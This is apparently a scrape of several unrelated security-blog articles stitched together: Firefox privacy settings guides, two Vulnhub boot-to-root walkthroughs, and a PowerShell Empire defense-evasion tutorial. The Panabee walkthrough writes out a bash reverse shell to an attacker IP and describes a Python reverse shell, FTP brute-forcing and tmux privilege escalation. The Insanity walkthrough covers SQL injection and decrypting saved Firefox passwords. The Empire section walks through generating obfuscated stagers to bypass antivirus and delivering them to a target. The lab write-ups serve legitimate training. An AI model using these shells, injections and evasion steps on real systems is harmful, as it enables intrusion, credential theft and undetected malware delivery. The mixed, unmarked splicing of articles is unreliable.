To add this extension, open your browser and search for it in the extension store. Click on the "Add to Firefox" button, then click "Add" in the pop-up dialogue box, as shown in the image below. The extension will be added to your browser, and you can customise its settings from the extension widget on the right-hand side of the URL bar.

 



Conclusion

Major social media, shopping websites, and other webpages track you through your likes and dislikes, along with your location, and maintain a log of your every online activity. They even track the things that you start to write but do not post, to measure your self-censorship. And these are just a few of the things we have mentioned; to get a better sense of internet tracking, you can read our article here. Using all such add-ons, you can stay safe and secure online, with quick and secure internet access and amplified protection.

All of these add-ons are open source and free to use. They are trustworthy add-ons that provide security and privacy to any user. Best of all, each can be customised to the user's needs and requirements. Used consciously and properly, these extensions will make you all but non-existent as far as online tracking goes.

Panabee: 1: Vulnhub Walkthrough


Introduction

Today we are going to crack a vulnerable machine called Panabee: 1. It was created by ch4rm, who is available on Twitter under the handle aniqfakhrul. This is a boot-to-root challenge: we need to get root privileges on the machine and read the root flag to complete it. Overall, it was an intermediate machine to crack.

Download Lab from here.

Penetration Testing Methodology

·         Network Scanning

o   Nmap Port Scan

·         Enumeration

o   Browsing HTTP Service

o   Enumerating SMB Service

o   Bruteforcing FTP Credentials

o   Enumerating FTP Service

·         Exploitation

o   Exploiting File Upload Vulnerability

·         Post Exploitation

o   Enumerating Sudo Permissions

o   Uploading Malicious Script

o   Getting Jenny User Session

o   Downloading pspy64 script

o   Running pspy64 script

·         Privilege Escalation

o   Exploiting tmux for Root

·         Reading Root Flag

Walkthrough

Network Scanning

The IP address of the machine is found to be 192.168.0.165. To move forward, we need to find the services running on the machine. We can achieve this using an Nmap aggressive scan. Nmap reveals a number of services: FTP (21), SSH (22), SMTP (25), HTTP (80), and NetBIOS/SMB (139, 445).

nmap -p- -A 192.168.0.165



Enumeration

We start with the enumeration stage. The first service we decided to look at was HTTP. Browsing to the IP address, we see an Apache2 default page. Nothing special to see here.



Next, we decided to enumerate SMB. We connected to the service using the smbclient tool and saw a bunch of shares hosted on the machine. The share "note" seemed worth looking into, so we reconnected to that share. There we found a text file by the same name and downloaded it to our local system using the get command. Reading the text file, we saw it was addressed to goper. Cool, a username. The note apologises for a late response and mentions that the server backs up whatever files are in the home directory of the user goper.

smbclient -L \\192.168.0.165

smbclient \\\\192.168.0.165\\note

ls

get note.txt

exit

cat note.txt



Since there is a user on the machine named goper, it is possible that goper has access to the FTP service. The issue with this theory is that we still do not know a password for goper. This is where bruteforcing seemed like a good idea. We used the rockyou wordlist with Hydra as the bruteforcing tool. In a few seconds, it showed us that the password for the user goper is spiderman. My spider senses are tingling here. Let's take a look inside the FTP service.

hydra -l goper -P /usr/share/wordlists/rockyou.txt 192.168.0.165 ftp



We connect to the FTP service using the credentials we just found. Here we have a Python file named status.py. We downloaded status.py to our local system for a closer look. A quick read of the script shows that all it does is send ping packets to a server IP address and write whether the server is up or down to a file, status.txt, inside the user jenny's home directory. Cool, another user.

ftp 192.168.0.165

ls

get status.py

bye

cat status.py



Exploitation

Since there is a backup mechanism and an FTP service, we can upload files to the target machine as the user goper. That makes this simple: we can create a basic bash reverse shell, upload it over FTP, and get a session on the target machine. We created a shell file as shown in the image below.

#!/bin/bash

bash -i >& /dev/tcp/192.168.0.147/8080 0>&1

Now we connect to the FTP service again and we upload the backup.sh payload file using the put command. The upload was successful.

ftp 192.168.0.165

goper

put backup.sh

ls



Post Exploitation

We started a netcat listener to capture the session generated by the payload and got a session within a few moments. After getting the session, we used the sudo -l command to check for binaries that could be used to escalate privileges on the target machine. We can see that we can execute the status.py file as the jenny user. That means we need to replace status.py with a reverse shell and get a session as jenny.

nc -lvp 8080

sudo -l



We created a Python reverse shell targeting port 8888 of our local machine.
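As a hedged sketch of this step, a typical Python reverse shell pointing back to 192.168.0.147:8888 (the attacker IP and port used in this walkthrough) can be written out as follows; the author's exact file is not reproduced here, so treat this as an illustration:

```shell
# Hypothetical reconstruction: overwrite status.py with a Python reverse shell
# that connects back to our netcat listener.
cat > status.py <<'EOF'
import socket, subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.147", 8888))    # attacker IP and listener port
os.dup2(s.fileno(), 0)                # wire stdin, stdout and stderr
os.dup2(s.fileno(), 1)                # of the spawned shell to the socket
os.dup2(s.fileno(), 2)
subprocess.call(["/bin/bash", "-i"])  # interactive shell over the socket
EOF
```

When this file is later executed via sudo as jenny, the shell lands on whatever listener is waiting on port 8888.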



Now we need to send this file to the target machine, again using the FTP service. Once uploaded, the shell file won't have execute permissions, so we set them with the chmod command from the FTP shell as shown in the image below.

put status.py

chmod 777 status.py



Now we create a listener on port 8888 and get back to the session we have as the goper user. Here we execute the file we just uploaded, as the jenny user.

sudo -u jenny /usr/bin/python3 /home/goper/status.py



We get back to the listener we created and can see that we have a session as jenny. We move to the tmp directory, as it has write permissions. Then we download the pspy64 script onto the target machine, give it the proper permissions, and execute it.

nc -lvp 8888

python3 -c 'import pty; pty.spawn("/bin/bash")'

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

chmod 777 pspy64

./pspy64



We see that there are processes related to a tmux server. This means it may be possible to get root using tmux.



We also take a look at the bash history and find that tmux was used a lot. The commands show that a tmux session is being shared, and that the default tmux socket is located in the /opt directory.



Privilege Escalation

Getting root from tmux is not that difficult a task. If you are not familiar with tmux, or with getting root through tmux, check our article here. We need to export TERM as xterm before attaching, then use tmux to attach to the default socket.

export TERM=xterm

tmux -S /opt/.tmux-0/sockets/default attach



With TERM set to xterm, tmux attaches and we have root privileges, as shown in the image below. Now we traverse into the root directory to read the root flag. This concludes the box.

id

cd /root

ls

cat proof.txt

Firefox for Pentester: Privacy and Protection Configurations


Introduction

This is the second article in the series "Firefox for Pentester". Previously we talked about how to enhance privacy and protection in Firefox using various add-ons; in this article, we will learn to protect ourselves online through the configuration options that Firefox provides. Compared to other browsers, Firefox protects our data and information the most, and it is arguably the best browser available today: it offers privacy features, active development, strong security and, the cherry on top, frequent updates. But we can still make it much more secure by modifying a few options.

Table of Content:

·         Introduction

·         Configuration Settings

·         Isolating First Party Domains

·         Preventing Browser Fingerprinting

·         Enabling Tracking Protection (Browser Fingerprinting)

·         Enabling Tracking Protection (Crypto Mining)

·         Enabling Tracking Protection

·         Blocking Ping Tracking

·         Disabling URL Preloading

·         Keeping Clipboard Private

·         Disabling EME Media

·         Restricting DRM Content

·         Disabling Media Navigation

·         Restricting Cookie Behaviour

·         Control Referrer Header

·         Restricting Referrer Header

·         Restricting WebGL

·         Disabling Session Restoring

·         Disabling Beacon

·         Securing Remote Downloads

·         Firefox Prefetching

·         Disabling IDN Punycode Conversion

·         Conclusion

 

Configuration Settings

When playing with the configurations in Firefox, numerous elements should be examined. Every option should be well understood before changes are made, as they will change the way you browse the internet. To change Firefox's configuration, type "about:config" in the URL bar as shown in the image below:



 

Once the about:config page loads, it will show you a warning stating that any changes you make from here on will void your warranty and are at your own risk. To move forward, click on "I accept the risk!" as shown in the image above. You will then see the page shown in the image below, where all the options regarding online privacy and protection are found.

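Beyond clicking through about:config, Firefox also reads a user.js file from the profile directory at startup and applies any user_pref() lines it contains, which is a convenient way to make this kind of change persistent. A minimal sketch (the pref selection here is just an example of the options covered in this article, and the profile path varies per system; find yours via about:profiles):

```shell
# Sketch: write a user.js applying several of the privacy prefs covered in
# this article, then copy it into your Firefox profile directory.
cat > user.js <<'EOF'
user_pref("privacy.firstparty.isolate", true);
user_pref("privacy.resistFingerprinting", true);
user_pref("privacy.trackingprotection.enabled", true);
user_pref("browser.send_pings", false);
user_pref("network.cookie.cookieBehavior", 1);
user_pref("network.http.referer.XOriginPolicy", 2);
EOF
```

Firefox applies these values on the next start, and they show up as "modified" in about:config just as if you had toggled them by hand.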


Isolating First-Party Domains

The first option we will modify is "privacy.firstparty.isolate". This built-in feature keys your browsing data to the first-party domain you are visiting. That means the third-party domains that tag along with first-party domains can no longer track your activity online or collect your data across sites: first-party domains are isolated from one another and their data is stored separately, so cross-origin tracking is nullified. Hence, third-party cookies, hidden cookies, data sharing, and similar mechanisms are neutralized.

This option can be searched through the search bar. By default, it is set to the value false, i.e. it is disabled, because enabling it breaks the authentication systems of many websites. But if you are pro-privacy and anti-tracking like us, double-click on the option to change its value to true and enable it. Once the option is enabled, its status will change from default to modified as shown in the image below:

privacy.firstparty.isolate

Preventing Browser Fingerprinting

The next option is "privacy.resistFingerprinting". To understand what it does, let us first understand browser fingerprinting. The client-side scripting that allows a website to load in the browser also permits browser fingerprinting. Through it, websites collect information about the browser, the operating system, the Cache-Control and other headers, the list of fonts, the plugins in use, the microphone, the camera, and so on; fingerprinting scripts are therefore sometimes called cookie-less monsters. Fingerprinting starts the moment a connection is made to the website, and the collected traits can be abused for credential hijacking, data breaches, and more. All of this can be stopped by enabling the "privacy.resistFingerprinting" option in your browser.

This option can be searched through the search bar. By default, it is set to the value false, i.e. it is disabled, because enabling it breaks the authentication systems of many websites. But if you are pro-privacy and anti-tracking like us, double-click on the option to change its value to true and enable it. Once the option is enabled, its status will change from default to modified as shown in the image below:

privacy.resistFingerprinting



 

Enabling Tracking Protection (Browser Fingerprinting)

The next option we are going to talk about is privacy.trackingprotection.fingerprinting.enabled. It works much like the previous one, as it too protects you from browser fingerprinting. Along with preventing tracking across websites, it also helps prevent phishing attacks.

This option can be searched through the search bar. By default, it is set to the value false, i.e. it is disabled, because enabling it breaks the authentication systems of many websites. But if you are pro-privacy and anti-tracking like us, double-click on the option to change its value to true and enable it. Once the option is enabled, its status will change from default to modified as shown in the image below:

privacy.trackingprotection.fingerprinting.enabled

Enabling Tracking Protection (Crypto Mining)

The problem with crypto miners is that the calculations they perform require huge resources: CPU, power, and RAM. These resources are expensive, and not everyone can afford them, so what hackers do is take control of other people's systems and carry out their crypto mining there. To stop your browser from falling victim to cryptomining, all you have to do is enable the privacy.trackingprotection.cryptomining.enabled option.

This option can be searched through the search bar. By default, it is set to the value false, i.e. it is disabled, because enabling it breaks the authentication systems of many websites. But if you are pro-privacy and anti-tracking like us, double-click on the option to change its value to true and enable it. Once the option is enabled, its status will change from default to modified as shown in the image below:

privacy.trackingprotection.cryptomining.enabled



Enabling Tracking Protection

Our next option, privacy.trackingprotection.enabled, lets us stay completely invisible to tracking done through the browser. Tracking means keeping a record of your internet searches, the websites you visit, the data you share, and so on, and this option nullifies it by blocking every kind of tracker. It works from the disconnect.me filter list.

This option can be searched through the search bar. By default, it is set to the value false, i.e. it is disabled, because enabling it breaks the authentication systems of many websites. But if you are pro-privacy and anti-tracking like us, double-click on the option to change its value to true and enable it. Once the option is enabled, its status will change from default to modified as shown in the image below:

privacy.trackingprotection.enabled



Blocking Ping Tracking

To understand the next option, browser.send_pings, let us first understand hyperlink auditing. It is a tracking method in which the HTML code makes your browser ping a specified URL; this URL is pinged when you click a link on the website you are visiting. This method of tracking differs from the others in that it doesn't give users any kind of choice: it just runs in the background without the user knowing. To shut this method of tracking down, go into the Firefox configuration and disable the browser.send_pings option, which makes sure the browser blocks every kind of hyperlink auditing.

This option can be searched through the search bar. If its value is true, hyperlink auditing is allowed. If you are pro-privacy and anti-tracking like us, make sure its value is set to false, which blocks it. Once the value is modified, the status of the option will change from default to modified as shown in the image below:

browser.send_pings
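For illustration, hyperlink auditing is driven by the HTML "ping" attribute on links. A link like the following (with made-up URLs) makes the browser send a background POST to the tracker when clicked, unless ping tracking is blocked:

```shell
# Illustration with hypothetical URLs: the "ping" attribute that
# browser.send_pings governs. Clicking the link loads the href as usual,
# but also fires a background POST to the ping URL.
cat > ping-example.html <<'EOF'
<a href="https://example.com/article"
   ping="https://tracker.example/log">Read the article</a>
EOF
```

The user never sees the request to tracker.example, which is exactly why this option matters.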



Disabling URL Preloading

The browser.urlbar.speculativeConnect.enabled option helps us control URL preloading. While typing a URL, halfway through you must have noticed the auto-completion of the URL: this is URL preloading. When you start typing a URL, the browser sends out domain queries so that it can carry on with auto-completion. Disabling this stops URLs from being preloaded into the URL bar, which helps prevent suggestions you do not want or that could be considered insecure.

This option can be searched through the search bar. By default, it is set to the value true, i.e. it is enabled. But if you are pro-privacy and anti-tracking like us, double-click on the option to change its value to false and disable it. Once the option is disabled, its status will change from default to modified as shown in the image below:

browser.urlbar.speculativeConnect.enabled



Keeping Clipboard Private

Whenever you copy, cut, or paste anything from or to a website, the website gets notified in such detail that it knows exactly which part of the webpage you copied. This is done by tracking your clipboard. Through the dom.event.clipboardevents.enabled option, we can make sure that websites do not track our clipboard data.

This option can be searched through the search bar. By default, it is set to the value true, i.e. it is enabled. But if you are pro-privacy and anti-tracking like us, double-click on the option to change its value to false and disable it. Once the option is disabled, its status will change from default to modified as shown in the image below:

dom.event.clipboardevents.enabled



Disabling EME Media

EME (Encrypted Media Extensions) is the mechanism through which the browser downloads and plays encrypted media. Because such media is encrypted, it is hard to inspect its contents, and there have been instances of media files being fetched without the user realising it. Firefox provides an option through which we can make sure nothing of the sort happens.

The media.eme.enabled option is set to false by default, which means no encrypted media will be downloaded without the user's permission. It can be searched through the search bar. If by any chance this option is enabled, disable it as soon as possible. If it is already disabled, the status of this configuration will remain default as shown in the image below:

media.eme.enabled



Restricting DRM Content

The content you surf on the internet can never be fully trusted. When DRM-based software runs on a website, it can have file-level and even user-level control; user-level control allows it to access, share, download, or print whatever it desires. Therefore, you should stay in control at all times. Even if your browser nags you to enable DRM content, you shouldn't give in: if you do not want to see it, it shouldn't be able to run. Firefox provides the media.gmp-widevinecdm.enabled option, which allows you to restrict DRM content.

This option can be searched through the search bar. By default, it is set to the value true, i.e. the Widevine DRM module is enabled. But if you are pro-privacy and anti-tracking like us, double-click on the option to change its value to false and disable it. Once the option is disabled, its status will change from default to modified as shown in the image below:

media.gmp-widevinecdm.enabled



Disabling Media Navigation

This option, if enabled, allows your browser to extract information from your system and present it to the websites you visit; the collected data can be forwarded to third-party domains as well. If you allow it, it will collect information about the operating system, screen resolution, type of system, frame rate, facingMode of mobile devices, possible access to user media, and so on. To make it even worse, websites can control the permissions of audio/visual tabs in the browser and access the camera or microphone. We can all agree that keeping this option enabled is a major threat, and to save ourselves from these potential threats, we just have to disable the media.navigator.enabled option.

This option can be searched through the search bar. By default, it is set to the value true, i.e. it is enabled. But if you are pro-privacy and anti-tracking like us, double-click on the option to change its value to false and disable it. Once the option is disabled, its status will change from default to modified as shown in the image below:

media.navigator.enabled



Restricting Cookie Behaviour

There are various cookies generated when a website is visited. Some are necessary cookies, used for the features of the website; others are unimportant cookies such as third-party cookies, which are often the result of advertisements, widgets, and web analytics and which track your login information, shopping cart, the language you use, and so on. By default, the value of network.cookie.cookieBehavior is set to 0. The value can be set between 0 and 4, where:

0 = accept all cookie values

1 = only accept from first-party domains

2 = block all cookies by default

3 = use p3p settings

4 = storage access policy: Block cookies from trackers

We will select value 1 here as we only want cookies from first-party domains.

network.cookie.cookieBehavior



This option can be searched through the search bar. Once the value of the option is changed, the status of the option will be changed from default to modified as shown in the image below:



Control Referrer Header

While browsing the internet, a referrer header is sent to the website you request. This header contains information about the page you were previously on and from which you requested the next webpage. Usually, Firefox will not send a referrer header when going from HTTPS to HTTP. Sending such information in a referrer header can create security issues, as it can expose your personal information and private data. Put simply, with this option you can control whether the referrer is sent across origins, i.e. to different origin domains. Firefox's built-in tracking protection provides this through the network.http.referer.XOriginPolicy option, whose value can be set between 0 and 2, where:

0 = send the referrer in all cases

1 = send referrer only when the base domains are the same

2 = send referrer only on the same origin

The default value of this option is 0 i.e. send the referrer in all cases and we will change its value to 2 i.e. send the referrer only to the same origin.

network.http.referer.XOriginPolicy



This option can be searched through the search bar. Once the value of the option is changed, the status of the option will be changed from default to modified as shown in the image below:

 


Restricting Referrer Header

With the previous configuration setting, we learned that we can control whether we want to send referrer headers across origins or not. Now there will be many situations where it is necessary for you to send these referrer headers across origins or even within the same origin. Here, what you can do is restrict the header by controlling its contents. The option network.http.referer.XOriginTrimmingPolicy allows us to do so. This value can be set between the numbers 0 to 2, where:

0 = send the full URL

1 = send the URL without its query string

2 = only send the origin

The default value of this option is 0 i.e. send the full URL and we will change its value to 2 i.e. only send the origin.

network.http.referer.XOriginTrimmingPolicy



This option can be searched through the search bar. Once the value of the option is changed, the status of the option will be changed from default to modified as shown in the image below:

 


Restricting WebGL

WebGL is a feature of Firefox which lets webpages render 3D graphics. Alas! It comes with various security flaws. It makes it possible for attackers to target your graphics drivers along with the GPU, to the extent of making your whole system useless. Whether you want to use such a feature or not is left to the user's decision through the webgl.disabled configuration setting. Through this option, you can disable WebGL.

This option can be searched through the search bar. By default, this option is set to the value false i.e. WebGL is enabled by default. But if you are pro-privacy and anti-tracking like us then you should double left-click on this option to change its value to true. Setting the value from false to true will mean that you have now disabled WebGL. Once it is disabled, the status of the option will be changed from default to modified as shown in the image below:

webgl.disabled



Disabling Session Restoring

There are times when the user experiences a crash or power outage that causes the system to shut down. If the user had some URLs open in the browser or was logged in to some application, these are restored when the user restarts the system. Ever since the release of Firefox 2.0, this option has been enabled by default. Some users feel that this is a good functionality that helps them recover data or sessions, but it poses a security threat: if the original user doesn’t restart the system, or if this happens on a public system, then the person who accesses the system after the restart gains potential access to the logged-in sessions and websites that the original user was browsing. This option has 3 possible values.

0 = Store Extra Session data for any site

1 = Store Extra Session data for unencrypted (non-HTTPS) sites only

2 = Never store extra session data

The default value of this option is 0 i.e. Store the session data for any site and we will change its value to 2 i.e. Never store any data.

browser.sessionstore.privacy_level



This option can be searched through the search bar. Once the value of the option is changed, the status of the option will be changed from default to modified as shown in the image below:



Disabling Beacon

The beacon.enabled preference controls the Beacon API, which lets webpages asynchronously send small amounts of data (typically analytics and tracking information) back to a server, even as you navigate away from a page. It is useful to site owners for synchronizing analytics, but it is not compulsory, as it sends out details about your browsing without any visible request.

This option can be searched through the search bar. By default, this option is set to the value true i.e. it is enabled by default. You can double left-click on this option to change its value to false. Setting the value from true to false will mean that you have now disabled this option. Once the option is disabled, the status of the option will be changed from default to modified as shown in the image below:

beacon.enabled



Securing Remote Downloads

By default, remote safe-download checks are enabled in Firefox. We have often talked about instances where a file being downloaded seems genuine but is instead malware, and you can never be too sure. However, this check works by sending metadata about your downloads to a remote service. Using browser.safebrowsing.downloads.remote.enabled you can decide whether that information leaves your machine.

This option can be searched through the search bar. By default, this option is set to the value true i.e. it is enabled by default. You can double left-click on this option to change its value to false. Setting the value from true to false will mean that you have now disabled this option. Once the option is disabled, the status of the option will be changed from default to modified as shown in the image below:

browser.safebrowsing.downloads.remote.enabled


Firefox Prefetching

As the name tells, prefetching in Firefox is done to load webpages speedily for the user. A browser can fetch ahead of time the resources that it knows websites will use. Hence, at any point in time, they can be requested and the browser will already have the required information for the user. The browser will also foretell the domain names that you are most likely to visit, which speeds up the process of domain name resolving. This option was developed to save time on the user's end, but it turned out to be a security concern. Firefox can prefetch things like DNS records, network connections, IP addresses, etc.

This prefetching can be done via DNS (everything related to DNS) or HTTPS (HTTPS contents). It has proved to be a security concern, and so both DNS and HTTPS prefetching can be disabled via the following options:

network.dns.disablePrefetch

network.dns.disablePrefetchFromHTTPS

Both options are set to false by default. Change them to true and there will be no DNS or HTTPS prefetching. Once these options are set, their status will be changed to locked just as it is shown in the image below:



Another prefetcher that you can disable is the network predictor. This option prefetches details related to the network that you are connected to. It can be disabled by setting its value to false; this value is set to true by default. Once you change the option’s value to false, its status is changed to modified as shown in the image below:

network.predictor.enabled



Another option to disable, to disallow the browser from prefetching network details, is network.predictor.enable-prefetch. As its name suggests, this option allows network details to be prefetched. It can be disabled by setting its value to false.

network.predictor.enable-prefetch


The network.prefetch-next option allows certain links to be prefetched. This is done when the website lets the browser know that certain pages are likely to be visited, so the browser downloads them beforehand for the convenience of the user. It can be disabled by setting its value to false; this value is set to true by default. Once you change the option’s value to false, its status is changed to modified as shown in the image below:

network.prefetch-next



Disabling IDN Punycode Conversion

Before understanding this particular option, first you need to understand the meaning of IDN support. IDN makes it possible for websites to register domain names using characters originating from their local or native language. To support these characters, an encoding called “Punycode” was developed. By default, the value of network.IDN_show_punycode is false, which means IDNs are displayed in their native characters. But no matter how good a feature is, it can be abused. This was shown in 2005, when there was a huge rise in spoofing and phishing attacks using IDNs. This can be explained using the following example:

Original Domain: https://hackingarticles.in

Phishing Domain: https://hackingarticlés.in

Notice the é in the phishing domain. With this option left at false, Firefox displays the IDN with its Unicode characters, so users who don’t use é in their language still see something that looks like a simple e. This rendering makes it nearly impossible for a user to visually differentiate between the genuine and phishing domains.

This value is set to false by default. Once you change the option’s value to true, Firefox shows the raw punycode form of such domains and the option's status is changed to modified as shown in the image below:

network.IDN_show_punycode
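All of the preferences covered above can also be applied in one go by dropping a user.js file into your Firefox profile (the profile path can be found under about:profiles); Firefox reads this file at startup. A minimal sketch that writes such a file — the profile directory is yours to supply, and the values are the ones chosen in this article:

```python
from pathlib import Path

# Preference values chosen in this article. Adjust to taste.
PREFS = {
    "media.navigator.enabled": False,
    "network.cookie.cookieBehavior": 1,
    "network.http.referer.XOriginPolicy": 2,
    "network.http.referer.XOriginTrimmingPolicy": 2,
    "webgl.disabled": True,
    "browser.sessionstore.privacy_level": 2,
    "beacon.enabled": False,
    "browser.safebrowsing.downloads.remote.enabled": False,
    "network.dns.disablePrefetch": True,
    "network.dns.disablePrefetchFromHTTPS": True,
    "network.predictor.enabled": False,
    "network.predictor.enable-prefetch": False,
    "network.prefetch-next": False,
    "network.IDN_show_punycode": True,
}

def write_user_js(profile_dir):
    """Write a user.js file that Firefox applies on its next startup."""
    lines = []
    for name, value in PREFS.items():
        if isinstance(value, bool):
            js_value = "true" if value else "false"
        else:
            js_value = str(value)
        lines.append('user_pref("%s", %s);' % (name, js_value))
    path = Path(profile_dir) / "user.js"
    path.write_text("\n".join(lines) + "\n")
    return path
```

Point write_user_js at your own profile directory; on the next start the modified values show up in about:config just as if you had toggled them by hand.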


Conclusion

By enabling and disabling the configuration options provided by Firefox, you can achieve privacy and protection online without using plug-ins. This is a safe procedure, as third-party domains cannot track you. If, with these options enabled/disabled, you have issues with a particular web application, authentication, or media, then you should create a container in Firefox by using a temporary-container plugin or the profiling that Firefox provides. That way you stay safe and cross-origin tracking isn’t done in your browser, so your data and personal information are protected.

 

Insanity: 1 Vulnhub Walkthrough


Today we are going to solve another boot2root challenge called "Insanity: 1".  It's available at VulnHub for penetration testing and you can download it from here.

The merit of making this lab is due to Thomas Williams. Let's start and learn how to break it down successfully.

Level: Hard

Penetration Testing Methodology

Reconnaissance

§  Netdiscover

§  Nmap

Enumeration

§  Dirsearch

§  Wireshark

Exploiting

  • SQL Injection through e-mails
  • Password theft in database
  • Weak hash cracking

Privilege Escalation

§  Cracking passwords stored in Firefox

§  Capture the flag

Walkthrough

Reconnaissance

We are looking for the machine with netdiscover

$ netdiscover -i ethX



So, we put the IP address in our "/etc/hosts" file and start by running the map of all the ports with operating system detection, software versions, scripts and traceroute.

$ nmap -A -p- insanity.vh

 



Enumeration

The recognition and enumeration of vulnerable services was the hardest part of this machine, since it has many services that manage to entangle you, with all of them (except one) turning out to be rabbit holes.

 

Some evidence of these services (rabbit hole):

FTP:



Bludit (From here we will list the user "Otis".):



phpMyAdmin:



Having seen the above, we will go directly to the correct and vulnerable services.

We start with the organization's web service, a hosting service.



We fuzzed with dirsearch and found several directories, but we will focus only on two: "/monitoring/" and "/webmail/".



Well, we used the user "otis" and the password "123456" (obtained by guessing).



We enter a panel that monitors the internal server, and we see that we can add new servers.



We insert our IP (it can be any other one that is operative) and we see that it shows "Status: UP". What does this tell us? Well, that under the hood the application is running ping against our machine to check if it is on.



We use dirsearch again, this time fuzzing the content of “/monitoring/”.

We go through the directories obtained, until we reach the directory "/monitoring/class/".



We access the directory and we find what we already imagined, a "ping.php" file.



We open Wireshark and see that the machine does indeed execute a ping. Do you think the same as me? Of course we do! A command injection!


Let's do as usual, a proof of concept.



We wait for it to run, but we see that it does not work (Status: DOWN). We contrast this information with Wireshark and see no traffic either, so we are in another "rabbit hole".


Well, nothing, we continue with the other service. Now we have a "SquirrelMail" in version 1.4.22; if you look for exploits you will find that it is vulnerable to remote code execution (RCE), but I can tell you in advance that it will not work either xD.



We use the same credentials, access the "Inbox" and see that emails with errors are arriving. Attention! These emails only appear if the server is "DOWN".



We read one of them and, if we look at it, it is structured in 4 columns... This is something that caught my attention, since it seems to be loading this information from a database.



Seeing this, I lost my mind and came up with the crazy idea of launching a payload list of SQL Injection (/usr/share/wfuzz/wordlist/vulns/sql_inj.txt).

Configuration Attack:



Executed attack:



Checking all the emails that we receive, we find this one showing "Localhost"; therefore, the site is vulnerable to SQL injection.



We do another test, this time we list the hostname and version of MariaDB.



Exploiting

We continue to exploit the vulnerability, although this would be faster by posting only 3 photos, I think it is worth seeing all these images, which will help us learn how to exploit SQL injection without any tools.

Obtain user and database:



Obtain all databases:



Obtain all tables:

 


Obtain all the columns in a table:



Dump users, passwords and emails:



After trying to crack the hashes of the two (hidden) users, it is not possible to obtain them even with JtR, Hashcat or online tools. Everything looks like another "rabbit hole".

We continue to list and find these two hashes in the "mysql" database.



The 2nd hash does not correspond to a MySQL hash; we use the online tool "hashes.com" and obtain the password in plain text.
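For reference, a modern MySQL PASSWORD() hash is 41 characters, starts with '*', and equals SHA1(SHA1(password)) — which is why a hash that doesn't fit that shape stands out. A small sketch for recognizing the format and testing guessed candidates offline (the candidate strings here are purely illustrative, not from the box):

```python
import hashlib

def mysql41_hash(password):
    """MySQL 4.1+ PASSWORD(): '*' + uppercase hex of SHA1(SHA1(password))."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

def looks_like_mysql41(h):
    """41 chars starting with '*' is the modern MySQL hash shape."""
    return len(h) == 41 and h.startswith("*")

# Illustrative check of a guessed candidate against a dumped hash
dumped = mysql41_hash("123456")   # stand-in for a hash pulled from the DB
print(looks_like_mysql41(dumped), mysql41_hash("123456") == dumped)
```

A hash that fails looks_like_mysql41 is worth feeding to generic identifiers or lookup services, as done above.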



We logged in through SSH and great! We are in!



Privilege Escalation (root)

We do an "ls -lna" and see that we have a "Mozilla Firefox" folder, which is very, very strange.

Whenever you see software folders like this, check them out, because it's not normal.



We check if the browser has been storing user passwords. How to check this? As simple as listing these 4 files.



If these files exist, it means that they contain passwords, and we can use the tool “Firefox_Decrypt” to obtain the passwords in plaintext.
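Which files to look for is shown in the image above; as a general rule (an assumption based on common Firefox profile layouts, not anything specific to this box), saved logins live in logins.json or signons.sqlite, with the encryption key in key4.db or key3.db. A quick sketch of that check:

```python
import os

# Typical Firefox credential-store files: newer profiles use
# logins.json/key4.db, older ones signons.sqlite/key3.db (assumption).
LOGIN_FILES = ("logins.json", "signons.sqlite")
KEY_FILES = ("key4.db", "key3.db")

def stored_passwords_likely(profile_dir):
    """True if a profile holds both a logins store and its key database."""
    present = set(f for f in LOGIN_FILES + KEY_FILES
                  if os.path.exists(os.path.join(profile_dir, f)))
    return any(f in present for f in LOGIN_FILES) and \
           any(f in present for f in KEY_FILES)
```

If this returns True for a profile, a tool like Firefox_Decrypt has something to work with.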

We download the tool, choose the 2nd option, and we do NOT provide a password when it asks for the "Master Password".

We will get credentials for the "root" user in plaintext.



We try to authenticate with the user "root" and the password obtained and.... Yes! we are root!

We read the flag and have a good coffee.



Author: David Utón is a Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contact him on LinkedIn and Twitter.

Defense Evasion with obfuscated Empire


In this article, we will learn the technique of Defence Evasion using the PowerShell Empire. PowerShell Empire is one of my favorite Post Exploitation tools and it is an applaudable one at that.

Table of Contents:

·         Installation

·         Getting a session with Empire

·         Obfuscating with Empire

Installation

When evading the target's defenses with Empire, it is important to focus on the installation. There are two methods to install Empire; the obfuscation scripts will not work if you install Empire using the apt install command. But this problem won't occur if you use the git clone command as shown in the image below.

git clone https://github.com/BC-SECURITY/Empire

The above command will download Empire on your system and to install it, use the following command:

cd Empire/

cd setup/

./install.sh

 



Getting a session with Empire

With the above commands, your Empire is downloaded and installed. Let us now get the Empire up and running and take a session of the target system. Once you start Empire, the first thing to do is to start a Listener. And to start a listener, use the set of following commands:

listeners

uselistener http

set Port 80

execute

 

The above commands will start a listener on port 80. Once the listener is active, we have to launch a stager. The stager that we are going to use in this article is of windows and is in batch language. To launch the stager, use the following set of commands:

back

usestager windows/launcher_bat

set Listener http

execute

 



Once your malware is ready, it will be stored in the /tmp directory by default, as you can see in the image above. To send this bat file to the target system, you can use a Python one-liner server or any other method you like. We used a Python server for this practical. To use the Python server, type the following command in the directory where the file is saved (in our case the /tmp directory; on Python 3 the equivalent is python3 -m http.server):

python -m SimpleHTTPServer

 



Once the file is executed on the target system, you will get your session as shown in the image below. To access the session, or agent (as per Empire terminology), use the following commands:

agents

interact <agent name>

 



In the event viewer, you can go to the Applications and Services Logs > Microsoft > Windows > PowerShell > Operational and check the log made by the batch file from Empire as shown in the image below:



Obfuscating with Empire

Now, you can see in the image above that the log of the file gives proper details of the malicious file. These details include the code of the file, where the file is stored, and other important information. These details, when readable by the system, make it easy for the file to be detected. For successfully attacking the target, it is important to evade all the defenses put up by the target. And to do so, we will globally obfuscate Empire and then create our malicious file. Obfuscating Empire means that all the malicious files generated from it will be obscure, i.e. hard to detect on the target system, allowing you to bypass defense systems like antiviruses. To obfuscate Empire, use the following command first:

preobfuscate

The above command will download all the scripts required for the obfuscation.



The command executed above takes a bit of time, but if it allows our attack to succeed then a little time is no problem and, most importantly, it is worth it. Once all the obfuscation scripts are downloaded, execute the following command:

set Obfuscate true

This command will initiate the obfuscation: all stagers and agents created from now on will be obfuscated, as you can see in the image below:



Now once the obfuscation is active, we will once again execute the listener as shown previously in this article and once the listener is up and running we will launch a stager with the following set of commands:

usestager windows/launcher_bat

set Listener http

execute

 



Similarly, like before, use the python server to deliver the malicious file to the target system.

